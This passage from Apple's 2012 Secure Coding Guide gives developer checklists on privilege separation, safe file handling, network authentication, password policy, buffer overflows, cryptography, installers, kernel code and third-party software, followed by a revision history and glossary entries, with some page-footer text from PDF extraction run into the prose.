Important: If all or most of your code runs with root or other elevated privileges, or if you have complex code that performs multiple operations with elevated privileges, then your program could have a serious security vulnerability. You should seek help in performing a security audit of your code to reduce your risk.
See “Elevating Privileges Safely” (page 59) and “Designing Secure Helpers And Daemons” (page 81) for more information.

3. Use launchd when possible.
If you are writing a daemon or other process that runs with elevated privileges, you should always use launchd to start it. (To learn why other mechanisms are not recommended, read “Limitations And Risks Of Other Mechanisms” (page 67).)
For more information on launchd, see the manual pages for launchd, launchctl, and launchd.plist, and Daemons and Services Programming Guide. For more information about startup items, see Daemons and Services Programming Guide. For more information on ipfw, see the ipfw manual page.

4. Avoid using sudo programmatically.
If authorized to do so in the sudoers file, a user can use sudo to execute a command as root. The sudo command is intended for occasional administrative use by a user sitting at the computer and typing into the Terminal application. Its use in scripts or called from code is not secure.
After executing the sudo command (which requires authenticating by entering a password), there is, by default, a five-minute period during which the sudo command can be executed without further authentication. It’s possible for another process to take advantage of this situation to execute a command as root.
Further, there is no encryption or protection of the command being executed. Because sudo is used to execute privileged commands, the command arguments often include user names, passwords, and other information that should be kept secret. A command executed in this way by a script or other code can expose confidential data to possible interception and compromise.
5. Minimize the amount of code that must be run with elevated privileges.
Ask yourself approximately how many lines of code need to run with elevated privileges. If the answer is “all” or is difficult to compute, then it will be very difficult to perform a security review of your software.
If you can’t determine how to factor your application to separate out the code that needs privileges, you are strongly encouraged to seek assistance with your project immediately. If you are an ADC member, you are encouraged to ask for help from Apple engineers with factoring your code and performing a security audit. If you are not an ADC member, see the ADC membership page at http://developer.apple.com/programs/.

6. Never run a GUI application with elevated privileges.
You should never run a GUI application with elevated privileges. Any GUI application links in many libraries over which you have no control and which, due to their size and complexity, are very likely to contain security vulnerabilities. In this case, your application runs in an environment set by the GUI, not by your code. Your code and your user’s data can then be compromised by the exploitation of any vulnerabilities in the libraries or environment of the graphical interface.

Data, Configuration, and Temporary Files

Some security vulnerabilities are related to reading or writing files. This checklist is intended to help you find any such vulnerabilities in your code.

1. Be careful when working with files in untrusted locations.
If you write to any directory owned by the user, then there is a possibility that the user will modify or corrupt your files.
Similarly, if you write temporary files to a publicly writable place (for example, /tmp, /var/tmp, /Library/Caches or another specific place with this characteristic), an attacker may be able to modify your files before the next time you read them.
If your code reads and writes files (and in particular if it uses files for interprocess communication), you should put those files in a safe directory to which only you have write access.
For more information about vulnerabilities associated with writing files, and how to minimize the risks, see “Time of Check Versus Time of Use” (page 44).

2. Avoid untrusted configuration files, preference files, or environment variables.
In many cases, the user can control environment variables, configuration files, and preferences. If you are executing a program for the user with elevated privileges, you are giving the user the opportunity to perform operations that they cannot ordinarily do. Therefore, you should ensure that the behavior of your privileged code does not depend on these things.
This means:
● Validate all input, whether directly from the user or through environment variables, configuration files, preferences files, or other files. In the case of environment variables, the effect might not be immediate or obvious; however the user might be able to modify the behavior of your program or of other programs or system calls.
● Make sure that file paths do not contain special path elements, such as ../ or ~, which an attacker can use to switch the current directory to one under the attacker’s control.
● Explicitly set the privileges, environment variables, and resources available to the running process, rather than assuming that the process has inherited the correct environment.

3. Load kernel extensions carefully (or not at all).
A kernel extension is the ultimate privileged code; it has access to levels of the operating system that cannot be touched by ordinary code, even running as root. You must be extremely careful why, how, and when you load a kernel extension to guard against being fooled into loading the wrong one. It’s possible to load a root kit if you’re not sufficiently careful. (A root kit is malicious code that, by running in the kernel, can not only take over control of the system but can cover up all evidence of its own existence.)
To make sure that an attacker hasn’t somehow substituted his or her own kernel extension for yours, you should always store kernel extensions in secure locations. You may, if desired, use code signing or hashes to further verify their authenticity, but this does not remove the need to protect the extension with appropriate permissions. (Time-of-check vs. time-of-use attacks are still possible.) Note that in recent versions of OS X, this is partially mitigated by the KEXT loading system, which refuses to load any kext binary whose owner is not root or whose group is not wheel.
In general, you should avoid writing kernel extensions (see “Keep Out” in Kernel Programming Guide). However, if you must use a kernel extension, use the facilities built into OS X to load your extension and be sure to load the extension from a separate privileged process.
See “Elevating Privileges Safely” (page 59) to learn more about the safe use of root access. See Kernel Programming Guide for more information on writing and loading kernel extensions. For help on writing device drivers, see I/O Kit Fundamentals.

Network Port Use

This checklist is intended to help you find vulnerabilities related to sending and receiving information over a network. If your project does not contain any tool or application that sends or receives information over a network, skip to “Audit Logs” (page 91) (for servers) or “Integer and Buffer Overflows” (page 97) for all other products.

1. Use assigned port numbers.
Port numbers 0 through 1023 are reserved for use by certain services specified by the Internet Assigned Numbers Authority (IANA; see http://www.iana.org/). On many systems including OS X, only processes running as root can bind to these ports. It is not safe, however, to assume that any communications coming over these privileged ports can be trusted. It’s possible that an attacker has obtained root access and used it to bind to a privileged port. Furthermore, on some systems, root access is not needed to bind to these ports.
You should also be aware that if you use the SO_REUSEADDR socket option with UDP, it is possible for a local attacker to hijack your port.
Therefore, you should always use port numbers assigned by the IANA, you should always check return codes to make sure you have connected successfully, and you should check that you are connected to the correct port. Also, as always, never trust input data, even if it’s coming over a privileged port. Whether data is being read from a file, entered by a user, or received over a network, you must validate all input. See “Validating Input And Interprocess Communication” (page 33) for more information about validating input.

2. Choose an appropriate transport protocol.
Lower-level protocols, such as UDP, provide higher performance for some types of traffic, but are easier to spoof than higher-level protocols, such as TCP.
Note that if you’re using TCP, you still need to worry about authenticating both ends of the connection, but there are encryption layers you can add to increase security.

3. Use existing authentication services when authentication is needed.
If you’re providing a free and nonconfidential service, and do not process user input, then authentication is not necessary.
On the other hand, if any secret information is being exchanged, the user is allowed to enter data that your program processes, or there is any reason to restrict user access, then you should authenticate every user.
OS X provides a variety of secure network APIs and authorization services, all of which perform authentication. You should always use these services rather than creating your own authentication mechanism. For one thing, authentication is very difficult to do correctly, and dangerous to get wrong. If an attacker breaks your authentication scheme, you could compromise secrets or give the attacker an entry to your system.
The only approved authorization mechanism for networked applications is Kerberos; see “Client-Server Authentication” (page 93). For more information on secure networking, see Secure Transport Reference and CFNetwork Programming Guide.

4. Verify access programmatically.
UI limitations do not protect your service from attack. If your service provides functionality that should only be accessible to certain users, that service must perform appropriate checks to determine whether the current user is authorized to access that functionality.
If you do not do this, then someone sufficiently familiar with your service can potentially perform unauthorized operations by modifying URLs, sending malicious Apple events, and so on.

5. Fail gracefully.
If a server is unavailable, either because of some problem with the network or because the server is under a denial of service attack, your client application should limit the frequency and number of retries and should give the user the opportunity to cancel the operation.
Poorly designed clients that retry connections too frequently and too insistently, or that hang while waiting for a connection, can inadvertently contribute to, or even cause their own, denial of service.

6. Design your service to handle high connection volume.
Your daemon should be capable of surviving a denial of service attack without crashing or losing data. In addition, you should limit the total amount of processor time, memory, and disk space each daemon can use, so that a denial of service attack on any given daemon does not result in denial of service to every process on the system.
You can use the ipfw firewall program to control packets and traffic flow for internet daemons. For more information on ipfw, see the ipfw(8) manual page. See Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secure-programs/, for more advice on dealing with denial of service attacks.

7. Design hash functions carefully.
Hash tables are often used to improve search performance. However, when there are hash collisions (where two items in the list have the same hash result), a slower (often linear) search must be used to resolve the conflict. If it is possible for a user to deliberately generate different requests that have the same hash result, by making many such requests an attacker can mount a denial of service attack.
It is possible to design hash tables that use complex data structures such as trees in the collision case. Doing so can significantly reduce the damage caused by these attacks.

Audit Logs

It’s very important to audit attempts to connect to a server or to gain authorization to use a secure program. If someone is attempting to attack your program, you should know what they are doing and how they are doing it.
Furthermore, if your program is attacked successfully, your audit log is the only way you can determine what happened and how extensive the security breach was. This checklist is intended to help you make sure you have an adequate logging mechanism in place.
Important: Don’t log confidential data, such as passwords, which could then be read later by a malicious user.

1. Audit attempts to connect.
Your daemon or secure program should audit connection attempts (both successful attempts and failures). Note that an attacker can attempt to use the audit log itself to create a denial of service attack; therefore, you should limit the rate of entering audit messages and the total size of the log file. You also need to validate the input to the log itself, so that an attacker can’t enter special characters such as the newline character that you might misinterpret when reading the log.
See Wheeler, Secure Programming for Linux and Unix HOWTO for some advice on audit logs.

2. Use the libbsm auditing library where possible.
The libbsm auditing library is part of the TrustedBSD project, which in turn is a set of trusted extensions to the FreeBSD operating system. Apple has contributed to this project and has incorporated the audit library into the Darwin kernel of the OS X operating system. (This library is not available in iOS.)
You can use the libbsm auditing library to implement auditing of your program for login and authorization attempts. This library gives you a lot of control over which events are audited and how to handle denial of service attacks.
The libbsm project is located at http://www.opensource.apple.com/darwinsource/Current/bsm/. For documentation of the BSM service, see the “Auditing Topics” chapter in Sun Microsystems’ System Administration Guide: Security Services located at http://docs.sun.com/app/docs/doc/806-4078/6jd6cjs67?a=view.

3. If you cannot use libbsm, be careful when writing audit trails.
When using audit mechanisms other than libbsm, there are a number of pitfalls you should avoid, depending on what audit mechanism you are using:
● syslog
Prior to the implementation of the libbsm auditing library, the standard C library function syslog was most commonly used to write data to a log file.
If you are using syslog, consider switching to libbsm, which gives you more options to deal with denial of service attacks. If you want to stay with syslog, be sure your auditing code is resistant to denial of service attacks, as discussed in step 1.
● Custom log file
If you have implemented your own custom logging service, consider switching to libbsm to avoid inadvertently creating a security vulnerability. In addition, if you use libbsm your code will be more easily maintainable and will benefit from future enhancements to the libbsm code.
If you stick with your own custom logging service, you must make certain that it is resistant to denial of service attacks (see step 1) and that an attacker can’t tamper with the contents of the log file.
Because your log file must be either encrypted or protected with access controls to prevent tampering, you must also provide tools for reading and processing your log file.
Finally, be sure your custom logging code is audited for security vulnerabilities.

Client-Server Authentication

If any private or secret information is passed between a daemon and a client process, both ends of the connection should be authenticated. This checklist is intended to help you determine whether your daemon’s authentication mechanism is safe and adequate. If you are not writing a daemon, skip to “Integer and Buffer Overflows” (page 97).

1. Do not store, validate, or modify passwords yourself.
It’s a very bad idea to store, validate, or modify passwords yourself, as it’s very hard to do so securely, and OS X and iOS provide secure facilities for just that purpose.
● In OS X, you can use the keychain to store passwords and Authorization Services to create, modify, delete, and validate user passwords (see Keychain Services Programming Guide and Authorization Services Programming Guide).
● In OS X, if you have access to an OS X Server setup, you can use Open Directory (see Open Directory Programming Guide ) to store passwords and authenticate users. ● On an iOS device, you can use the keychain to store passwords. iOS devices authenticate the application that is attempting to obtain a keychain item rather than asking the user for a password. By storing data in the keychain, you also ensure that they remain encrypted in any device backups. 2. Never send passwords over a network connection in cleartext form. You should never assume that an unencrypted network connection issecure. Information on an unencrypted network can be intercepted by any individual or organization between the client and the server. Even an intranet, which does not go outside of your company, is not secure. A large percentage of cyber crime is committed by company insiders, who can be assumed to have accessto a network inside a firewall. OS X provides APIs for secure network connections; see Secure Transport Reference and CFNetwork Programming Guide for details. 3. Use server authentication as an anti-spoofing measure. Although server authentication is optional in the SSL/TLS protocols, you should always do it. Otherwise, an attacker might spoof your server, injuring your users and damaging your reputation in the process. 4. Use reasonable pasword policies. ● Password strength Security Development Checklists Client-Server Authentication 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 93In general, it is better to provide the user with a meansto evaluate the strength of a proposed password rather than to require specific combinations of letters, numbers, or punctuation, as arbitrary rules tend to cause people to choose bad passwords to fit the standard (Firstname.123) instead of choosing good passwords. ● Password expiration Password expiration has pros and cons. If your service transmits passwords in cleartext form, it is absolutely essential. 
If your password transmission is considered secure, however, password expiration can actually weaken security by causing people to choose weaker passwords that they can remember or to write their passwords down on sticky notes on their monitors.
See Password Expiration Considered Harmful for more information.

● Non-password authentication
Hardware-token-based authentication provides far more security than any password scheme because the correct response changes every time you use it. These tokens should always be combined with a PIN, and you should educate your users so that they do not write their username or PIN on the token itself.

● Disabled accounts
When an employee leaves or a user closes an account, the account should be disabled so that it cannot be compromised by an attacker. The more active accounts you have, the greater the probability that one will have a weak password.

● Expired accounts
Expiring unused accounts reduces the number of active accounts, and in so doing, reduces the risk of an old account getting compromised by someone stealing a password that the user has used for some other service.
Note, however, that expiring a user account without warning the user first is generally a bad idea. If you do not have a means of contacting the user, expiring accounts is generally considered poor form.

● Changing passwords
You can require that the client application support the ability to change passwords, or you can require that the user change the password using a web interface on the server itself.
In either case, the user (or the client, on behalf of the user) must provide the previous password along with the new password (twice unless the client is updating it programmatically over a sufficiently robust channel).

● Lost password retrieval (such as a system that triggers the user’s memory or a series of questions designed to authenticate the user without a password)
Make sure your authentication method is not so insecure that an attacker doesn’t even bother to try a password, and be careful not to leak information, such as the correct length of the password, the email address to which the recovered password is sent, or whether the user ID is valid.
You should always allow (and perhaps even require) customers to choose their own security questions. Pre-written questions are inherently dangerous because any question that is general enough for you to ask it of a large number of people is:
    ● likely to be a request for information that a large number of that person’s friends already know. In all likelihood, everyone who attended your high school can guess (in a handful of guesses) who your kindergarten teacher was, who your high school mascot was, and so on.
    ● probably on your public profile on a social networking site. For example, if you ask where you were born, chances are that’s public information. Even if it isn’t on your profile, someone can dig it up through government records.
    ● potentially guessable given other information about the person. For example, given the last four digits of a social security number, someone’s birthdate, and the city in which that person was born, you can fairly easily guess the entire social security number.
Finally, you should always allow your users the option of not filling out security questions. The mere existence of security questions makes their accounts less secure, so security-conscious individuals should be allowed to refuse those questions entirely.

● Limitations on password length (adjustable by the system administrator)
In general, you should require passwords to be at least eight characters in length.
(As a side note, if your server limits passwords to a maximum of eight characters, you need to rethink your design. There should be no maximum password length at all, if possible.)

The more of these policies you enforce, the more secure your server will be. Rather than creating your own password database, which is difficult to do securely, you should use the Apple Password Server. See Open Directory Programming Guide for more information about the Password Server, Directory Service Framework Reference for a list of Directory Services functions, and the manual pages for pwpolicy(8), passwd(1), passwd(5), and getpwent(3) at http://developer.apple.com/documentation/Darwin/Reference/ManPages/index.html for tools to access the password database and set password policies.

5. Do not store unencrypted passwords and do not reissue passwords.
In order to reissue a password, you first have to cache the unencrypted password, which is bad security practice. Furthermore, when you reissue a password, you might also be reusing that password in an inappropriate security context.
For example, suppose your program is running on a web server, and you use SSL to communicate with clients. If you take a client’s password and use it to log into a database server to do something on the client’s behalf, there’s no way to guarantee that the database server keeps the password secure and does not pass it on to another server in cleartext form. Therefore, even though the password was in a secure context when it was being sent to the web server over SSL, when the web server reissues it, it’s in an insecure context.
If you want to spare your client the trouble of logging in separately to each server, you should use some kind of forwardable authentication, such as Kerberos.
For more information on Apple’s implementation of Kerberos, see http://developer.apple.com/darwin/projects/kerberos/.
Under no circumstances should you design a system in which system administrators or other employees can see users’ passwords. Your users are trusting you with passwords that they may use for other sites; therefore, it is extremely reckless to allow anyone else to see those passwords. Administrators should be allowed to reset passwords to new values, but should never be allowed to see the passwords that are already there.

6. Support Kerberos.
Kerberos is the only authorization service available over a network for OS X servers, and it offers single-sign-on capabilities. If you are writing a server to run on OS X, you should support Kerberos. When you do:
a. Be sure you’re using the latest version (v5).
b. Use a service-specific principal, not a host principal. Each service that uses Kerberos should have its own principal so that compromise of one key does not compromise more than one service. If you use a host principal, anyone who has your host key can spoof login by anybody on the system.
The only alternative to Kerberos is combining SSL/TLS authentication with some other means of authorization such as an access control list.

7. Restrict guest access appropriately.
If you allow guest access, be sure that guests are restricted in what they can do, and that your user interface makes clear to the system administrator what guests can do. Guest access should be off by default. It’s best if the administrator can disable guest access.
Also, as noted previously, be sure to limit what guests can do in the code that actually performs the operation, not just in the code that generates the user interface. Otherwise, someone with sufficient knowledge of the system can potentially perform those unauthorized operations in other ways (by modifying URLs, for example).

8. Do not implement your own directory service.
Open Directory is the directory server provided by OS X for secure storage of passwords and user authentication. It is important that you use this service and not try to implement your own, as secure directory servers are difficult to implement and an entire directory’s passwords can be compromised if it’s done wrong. See Open Directory Programming Guide for more information.

9. Scrub (zero) user passwords from memory after validation.
Passwords must be kept in memory for the minimum amount of time possible and should be written over, not just released, when no longer needed. It is possible to read data out of memory even if the application no longer has pointers to it.

Integer and Buffer Overflows

As discussed in “Avoiding Buffer Overflows And Underflows” (page 17), buffer overflows are a major source of security vulnerabilities. This checklist is intended to help you identify and correct buffer overflows in your program.

1. Use unsigned values when calculating memory object offsets and sizes.
Signed values make it easier for an attacker to cause a buffer overflow, creating a security vulnerability, especially if your application accepts signed values from user input or other outside sources.
Be aware that data structures referenced in parameters might contain signed values.
See “Avoiding Integer Overflows And Underflows” (page 27) and “Calculating Buffer Sizes” (page 25) for details.

2. Check for integer overflows (or signed integer underflows) when calculating memory object offsets and sizes.
You must always check for integer overflows or underflows when calculating memory offsets or sizes. Integer overflows and underflows can corrupt memory in ways that can lead to execution of arbitrary code.
See “Avoiding Integer Overflows And Underflows” (page 27) and “Calculating Buffer Sizes” (page 25) for details.

3. Avoid unsafe string-handling functions.
The functions strcat, strcpy, strncat, strncpy, sprintf, vsprintf, and gets have no built-in checks for string length, and can lead to buffer overflows.
For alternatives, read “String Handling” (page 22).

Cryptographic Function Use

This checklist is intended to help you determine whether your program has any vulnerabilities related to use of encryption, cryptographic algorithms, or random number generation.

1. Use trusted random number generators.
Do not attempt to generate your own random numbers.
There are several ways to obtain high-quality random numbers:
● In iOS, use the Randomization Services programming interface.
● In OS X:
    ● Read from /dev/random in OS X (see the manual page for random).
    ● Use the read_random function in the header file random.h in the Apple CSP module, which is part of Apple’s implementation of the CDSA framework (available at http://developer.apple.com/darwin/projects/security/).
Note that rand does not return good random numbers and should not be used.

2. Use TLS/SSL instead of custom schemes.
You should always use accepted standard protocols for secure networking. These standards have gone through peer review and so are more likely to be secure.
In addition, you should always use the most recent version of these protocols.
To learn more about the secure networking protocols available in OS X and iOS, read “Secure Network Communication APIs” in Cryptographic Services Guide.

3. Don’t roll your own crypto algorithms.
Always use existing optimized functions. It is very difficult to implement a secure cryptographic algorithm, and good, secure cryptographic functions are readily available.
To learn about the cryptographic services available in OS X and iOS, read Cryptographic Services Guide.

Installation and Loading

Many security vulnerabilities are caused by problems with how programs are installed or code modules are loaded.
This checklist is intended to help you find any such problems in your project.

1. Don’t install components in /Library/StartupItems or /System/Library/Extensions.
Code installed into these directories runs with root permissions. Therefore, it is very important that such programs be carefully audited for security vulnerabilities (as discussed in this checklist) and that they have their permissions set correctly.
For information on proper permissions for startup items, see “Startup Items”. (Note that in OS X v10.4 and later, startup items are deprecated; you should use launchd to launch your daemons instead. See Daemons and Services Programming Guide for more information.)
For information on permissions for kernel extensions, see Kernel Extension Programming Topics. (Note that beginning in OS X v10.2, OS X checks for permissions problems and refuses to load extensions unless the permissions are correct.)

2. Don’t use custom install scripts.
Custom install scripts add unnecessary complexity and risk, so when possible, you should avoid them entirely.
If you must use a custom install script, you should:
● If your installer script runs in a shell, read and follow the advice in “Shell Script Security” in Shell Scripting Primer.
● Be sure that your script follows the guidelines in this checklist just as the rest of your application does. In particular:
    ● Don’t write temporary files to globally writable directories.
    ● Don’t execute with higher privileges than necessary. In general, your script should execute with the same privileges the user has normally, and should do its work in the user’s directory on behalf of the user.
    ● Don’t execute with elevated privileges any longer than necessary.
    ● Set reasonable permissions on your installed app. For example, don’t give everyone read/write permission to files in the app bundle if only the owner needs such permission.
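As one illustration of setting reasonable permissions from installer code written in C, the sketch below creates a file that only its owner can write and then checks the result. It is a sketch under stated assumptions: create_owner_writable_file and is_group_or_world_writable are hypothetical helper names, and the mode 0644 is an example value rather than a recommendation from this checklist.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create a new file that only its owner may write.
 * Returns an open file descriptor, or -1 on failure. */
int create_owner_writable_file(const char *path)
{
    /* O_CREAT | O_EXCL makes the call fail if anything (including a
     * symbolic link) already exists at path, so an existing file is never
     * reused. Mode 0644 grants read/write access to the owner and read-only
     * access to everyone else; the process umask can clear bits from this
     * mode but cannot add any. */
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
}

/* Hypothetical helper: returns 1 if the open file is writable by its group
 * or by others, 0 if it is not, and -1 if its status cannot be read. */
int is_group_or_world_writable(int fd)
{
    struct stat st;

    if (fstat(fd, &st) != 0) {
        return -1;
    }
    return (st.st_mode & (S_IWGRP | S_IWOTH)) != 0;
}
```

An installer could call is_group_or_world_writable on each file it has just created and treat a nonzero result as an error to log and report.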
    ● Set your installer’s file code creation mask (umask) to restrict access to the files it creates (see “Securing File Operations” (page 47)).
    ● Check return codes, and if anything is wrong, log the problem and report the problem to the user through the user interface.
For advice on writing installation code that needs to perform privileged operations, see Authorization Services Programming Guide. For more information about writing shell scripts, read Shell Scripting Primer.

3. Load plug-ins and libraries only from secure locations.
An application should load plug-ins only from secure directories. If your application loads plug-ins from directories that are not restricted, then an attacker might be able to trick the user into downloading malicious code, which your application might then load and execute.

Important: In code running with elevated privileges, directories writable by the user are not considered secure locations.

Be aware that the dynamic link editor (dyld) might link in plug-ins, depending on the environment in which your code is running. If your code uses loadable bundles (CFBundle or NSBundle), then it is dynamically loading code and could potentially load bundles written by a malicious hacker.
See Code Loading Programming Topics for more information about dynamically loaded code.

Use of External Tools and Libraries

If your program includes or uses any command-line tools, you have to look for security vulnerabilities specific to the use of such tools. This checklist is intended to help you find and correct such vulnerabilities.

1. Execute tools safely.
If you are using routines such as popen or system to send commands to the shell, and you are using input from the user or received over a network to construct the command, you should be aware that these routines do not validate their input.
Consequently, a malicious user can pass shell metacharacters (such as an escape sequence or other special characters) in command line arguments. These metacharacters might cause the following text to be interpreted as a new command and executed.
In addition, when calling functions such as execlp, execvp, popen, or system that use the PATH environment variable to search for executables, you should always specify a complete absolute path to any tool that you want to run. If you do not, a malicious attacker can potentially cause you to run a different tool using an environment variable attack. When possible, use execvP (which takes an explicit search path argument) or avoid these functions altogether.
See Viega and McGraw, Building Secure Software, Addison Wesley, 2002, and Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secure-programs/, for more information on problems with these and similar routines and for secure ways to execute shell commands.

2. Do not pass sensitive information on the command line.
If your application executes command-line tools, keep in mind that your process environment is visible to other users (see man ps(1)). You must be careful not to pass sensitive information in an insecure manner. Instead, pass sensitive information to your tool through some other means such as:

● Pipe or standard input
A password is safe while being passed through a pipe; however, you must be careful that the process sending the password obtains and stores it in a safe manner.

● Environment variables
Environment variables can potentially be read by other processes and thus may not be secure. If you use environment variables, you must be careful to avoid passing them to any processes that your command-line tool or script might spawn.
See “Shell Script Security” in Shell Scripting Primer for details.

● Shared memory
Named and globally-shared memory segments can be read by other processes.
See “Interprocess Communication And Networking” (page 40) for more information about secure use of shared memory.

● Temporary file
Temporary files are safe only if kept in a directory to which only your program has access. See “Data, Configuration, and Temporary Files” (page 88), earlier in this chapter, for more information on temporary files.

3. Validate all arguments (including the name).
Also, remember that anyone can execute a tool; it is not executable exclusively through your program. Because all command-line arguments, including the program name (argv[0]), are under the control of the user, your tool should validate every parameter (including the name, if the tool’s behavior depends on it).

Kernel Security

This checklist is intended to help you program safely in the kernel.

Note: Coding in the kernel poses special security risks and is seldom necessary. See Coding in the Kernel for alternatives to writing kernel-level code.

1. Verify the authenticity of Mach-based services.
Kernel-level code can work directly with the Mach component. A Mach port is an endpoint of a communication channel between a client who requests a service and a server that provides the service. Mach ports are unidirectional; a reply to a service request must use a second port.
If you are using Mach ports for communication between processes, you should check to make sure you are contacting the correct process. Because Mach bootstrap ports can be inherited, it is important for servers and clients to authenticate each other. You can use audit trailers for this purpose.
You should create an audit record for each security-related check your program performs. See “Audit Logs” (page 91), earlier in this chapter, for more information on audit records.

2. Verify the authenticity of other user-space services.
If your kernel extension was designed to communicate with only a specific user-space daemon, you should check not only the name of the process, but also the owner and group to ensure that you are communicating with the correct process.

3. Handle buffers correctly.
When copying data to and from user space, you must:
a. Check the bounds of the data using unsigned arithmetic, just as you check all bounds (see “Integer and Buffer Overflows” (page 97), earlier in this chapter), to avoid buffer overflows.
b. Check for and handle misaligned buffers.
c. Zero all pad data when copying to or from user-space memory.
If you or the compiler adds padding to align a data structure in some way, you should zero the padding to make sure you are not adding spurious (or even malicious) data to the user-space buffer, and to make sure that you are not accidentally leaking sensitive information that may have been in that page of memory previously.

4. Limit the memory resources a user may request.
If your code does not limit the memory resources a user may request, then a malicious user can mount a denial of service attack by requesting more memory than is available in the system.

5. Sanitize any kernel log messages.
Kernel code often generates messages to the console for debugging purposes. If your code does this, be careful not to include any sensitive information in the messages.

6. Don’t log too much.
The kernel logging service has a limited buffer size to thwart denial of service attacks against the kernel. This means that if your kernel code logs too frequently or too much, data can be dropped.
If you need to log large quantities of data for debugging purposes, you should use a different mechanism, and you must disable that mechanism before deploying your kernel extension. If you do not, then your extension could become a denial-of-service attack vector.

7. Design hash functions carefully.
Hash tables are often used to improve search performance. However, when there are hash collisions (where two items in the list have the same hash result), a slower (often linear) search must be used to resolve the conflict. If it is possible for a user to deliberately generate different requests that have the same hash result, by making many such requests an attacker can mount a denial of service attack.
It is possible to design hash tables that use complex data structures such as trees in the collision case. Doing so can significantly reduce the damage caused by these attacks.

Third-Party Software Security Guidelines

This appendix provides secure coding guidelines for software to be bundled with Apple products.
Insecure software can pose a risk to the overall security of users’ systems. Security issues can lead to negative publicity and end-user support problems for Apple and third parties.

Respect Users’ Privacy

Your bundled software may use the Internet to communicate with your servers or third party servers. If so, you should provide clear and concise information to the user about what information is sent or retrieved and the reason for sending or receiving it.
Encryption should be used to protect the information while in transit. Servers should be authenticated before transferring information.

Provide Upgrade Information

Provide information on how to upgrade to the latest version. Consider implementing a “Check for updates…” feature. Customers expect (and should receive) security fixes that affect the software version they are running.
You should have a way to communicate available security fixes to customers.
If possible, you should use the Mac App Store for providing upgrades. The Mac App Store provides a single, standard interface for updating all of a user’s software. The Mac App Store also provides an expedited app review process for handling critical security fixes.

Store Information in Appropriate Places

Store user-specific information in the home directory, with appropriate file system permissions.
Take special care when dealing with shared data or preferences.
Follow the guidelines about file system permissions set forth in File System Programming Guide.
Take care to avoid race conditions and information disclosure when using temporary files. If possible, use a user-specific temporary file directory.

Avoid Requiring Elevated Privileges

Do not require or encourage users to be logged in as an admin user to install or use your application. You should regularly test your application as a normal user to make sure that it works as expected.

Implement Secure Development Practices

Educate your developers on how to write secure code to avoid the most common classes of vulnerabilities:
● Buffer overflows
● Integer overflows
● Race conditions
● Format string vulnerabilities

Pay special attention to code that:
● deals with potentially untrusted data, such as documents or URLs
● communicates over the network
● handles passwords or other sensitive information
● runs with elevated privileges such as root or in the kernel

Use APIs appropriate for the task:
● Use APIs that take security into account in their design.
● Avoid low-level C code when possible (e.g. use NSString instead of C-strings).
● Use the security features of OS X to protect user data.

Test for Security

As appropriate for your product, use the following QA techniques to find potential security issues:
● Test for invalid and unexpected data in addition to testing what is expected.
(Use fuzzing tools, include unit tests that test for failure, and so on.) ● Static code analysis ● Code reviews and audits Helpful Resources The other chaptersin this document describe best practicesfor writing secure code, including more information on the topics referenced above. Security Overview and Cryptographic Services Guide contain detailed information on security functionality in OS X that developers can use. Third-Party Software Security Guidelines Helpful Resources 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 105This table describes the changes to Secure Coding Guide . Date Notes 2012-06-11 Made minor typographical fixes. 2012-02-16 Fixed minor errors throughout. 2012-01-09 Updated for OS X v10.7. 2010-02-12 Added security guidelines. Added article on validating input--including the dangers of loading insecurely stored archives--and added information about the iOS where relevant. 2008-05-23 New document that describes techniques to use and factors to consider to make your code more secure from attack. 2006-05-23 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 106 Document Revision HistoryAES encryption Abbreviation for Advanced Encryption Standard encryption. A Federal Information Processing Standard (FIPS), described in FIPS publication 197. AES has been adopted by the U.S. government for the protection of sensitive, non-classified information. attacker Someone deliberately trying to make a program or operating system do something that it’s not supposed to do, such as allowing the attacker to execute code or read private data. authentication The process by which a person or other entity (such as a server) proves that it is who (or what) it says it is. Compare with authorization. authorization The process by which an entity such as a user or a server gets the right to perform a privileged operation. 
(Authorization can also refer to the right itself, as in “Bob has the authorization to run that program.”) Authorization usually involves first authenticating the entity and then determining whether it has the appropriate privileges. See also authentication. buffer overflow The insertion of more data into a memory buffer than was reserved for the buffer, resulting in memory locations outside the buffer being overwritten. See also heap overflow and stack overflow. CDSA Abbreviation for Common Data Security Architecture. An open software standard for a security infrastructure that provides a wide array of security services, including fine-grained access permissions, authentication of users, encryption, and secure data storage. CDSA has a standard application programming interface, called CSSM. CERT Coordination Center A center of Internet security expertise, located at the Software Engineering Institute, a federally funded research and development center operated by Carnegie Mellon University. CERT is an acronym for Computer Emergency Readiness Team.) certificate See digital certificate. Common Criteria A standardized process and set of standards that can be used to evaluate the security of software products developed by the governments of the United States, Canada, the United Kingdom, France, Germany, and the Netherlands. cracker See attacker. CSSM Abbreviation for Common Security Services Manager. A public application programming interface for CDSA. CSSM also defines an interface for plug-ins that implement security services for a particular operating system and hardware environment. CVE Abbreviation for Common Vulnerabilities and Exposures. A dictionary of standard names for security vulnerabilities located at http://www.cve.mitre.org/. You can run an Internet search on the CVE number to read details about the vulnerability. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 
107 Glossarydigital certificate A collection of data used to verify the identity of the holder. OS X supports the X.509 standard for digital certificates. exploit A program or sample code that demonstrates how to take advantage of a vulnerability.) FileVault An OS X feature, configured through the Security system preference, that encrypts everything in on the root volume (or everything in the user’s home directory prior to OS X v10.7). hacker An expert programmer—generally one with the skill to create an exploit. Most hackers do not attack other programs, and some publish exploits with the intent of forcing software developers to fix vulnerabilities. See also script kiddie. heap A region of memory reserved for use by a program during execution. Data can be written to or read from any location on the heap, which grows upward (toward highermemory addresses). Compare with stack. heap overflow A buffer overflow in the heap. homographs Characters that look the same but have different Unicode values, such as the Roman character p and the Russian glyph that is pronounced like “r”. integer overflow A buffer overflow caused by entering a number that is too large for an integer data type. Kerberos An industry-standard protocol created by the Massachusetts Institute of Technology (MIT) to provide authentication over a network. keychain A database used in OS X to store encrypted passwords, private keys, and othersecrets. It is also used to store certificates and other non-secret information that is used in cryptography and authentication. Keychain Access utility An application that can be used to manipulate data in the keychain. Keychain Services A public API that can be used to manipulate data in the keychain. level of trust The confidence a user can have in the validity of a certificate. 
